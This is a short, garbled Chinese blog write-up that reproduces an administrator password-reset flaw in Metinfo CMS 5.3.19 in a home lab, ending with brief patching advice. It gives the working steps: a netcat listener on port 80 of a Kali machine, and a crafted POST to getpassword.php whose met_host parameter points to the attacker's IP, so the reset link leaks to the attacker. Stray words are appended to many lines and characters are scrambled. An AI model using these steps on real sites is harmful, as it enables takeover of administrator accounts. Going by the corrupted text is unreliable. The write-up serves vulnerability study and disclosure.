Metinfo 5.3.19管理員密碼重置漏洞php
操做系統:Windows 10專業版 kali linuxhtml
網站環境:UPUPW 5.3linux
使用工具:burpsuite 1.7 beta瀏覽器
漏洞分析
#密碼重置過程當中驗證不嚴工具
#漏洞涉及到的幾個文件分別是:優化
admin/admin/getpassword.php網站
include/common.inc.phpui
include/jmail.phpspa
include/export.func.php操作系統
安裝(請忽略我用QQ瀏覽器)
upupw默認數據帳戶密碼:root--root
漏洞復現
登錄localhost/metinfo/admin點擊忘記密碼
用burp抓包
在kali虛擬機上監聽80端口
nc -lvvp 80
kali機器上IP爲192.168.43.15
在burp repeater中構造http請求發送
POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15
這時候在咱們kali監聽的80端口監聽到了密碼重置的連接
打開連接進入設置密碼界面
我這裏好幾回沒有監聽到不知到是怎末回事重啓了kali就能夠了(計算機玄學吧有時候得信)
漏洞建議:
升級CMS版本
二次開發中優化登錄代碼避免邏輯錯誤
原文出處:https://www.cnblogs.com/xiaoyunxiaogang/p/10927652.html